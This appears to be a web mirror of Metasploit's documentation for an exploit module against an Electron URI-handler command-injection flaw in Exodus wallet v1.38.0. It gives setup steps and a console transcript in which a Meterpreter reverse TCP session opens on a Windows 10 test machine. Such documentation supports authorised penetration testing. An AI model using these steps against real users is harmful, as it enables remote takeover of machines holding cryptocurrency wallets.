CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/browser/exodus.md
Views: 1904

Description

This module exploits an Electron remote code execution vulnerability in Exodus wallet. Using the Electron remote code execution vulnerability in protocol handler is possible to inject command line arguments via URI handler. This module has been tested successfully on Windows 10 Enterprise x64. The vulnerable application is available for download at Exodus v1.38.0.

Verification Steps

  1. Install Exodus Wallet version v1.38.0

  2. Start msfconsole

  3. Do use exploit/windows/browser/exodus

  4. Do set PAYLOAD windows/meterpreter/reverse_tcp

  5. Do set LHOST ip

  6. Do exploit

  7. On the target machine, browse to the malicious URL and launch Exodus

  8. Verify the Meterpreter session is opened

Scenarios

Exodus Wallet v1.38.0 on Windows 10 Enterprise x64

msf > use exploit/windows/browser/exodus
msf exploit(windows/browser/exodus) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/browser/exodus) > set LHOST 172.16.40.5 
LHOST => 172.16.40.5
msf exploit(windows/browser/exodus) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.40.5:4444 
[*] Using URL: http://0.0.0.0:80/
msf exploit(windows/browser/exodus) > [*] Local IP: http://172.16.40.5:80/
[*] Server started.
[*] 172.16.40.149    exodus - Delivering Payload
[*] Sending stage (179779 bytes) to 172.16.40.149
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.149:49726) at 2018-02-23 15:40:17 +0000

msf exploit(windows/browser/exodus) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : DESKTOP-PI8214R
OS              : Windows 10 (Build 10586).
Architecture    : x64
System Language : pt_PT
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >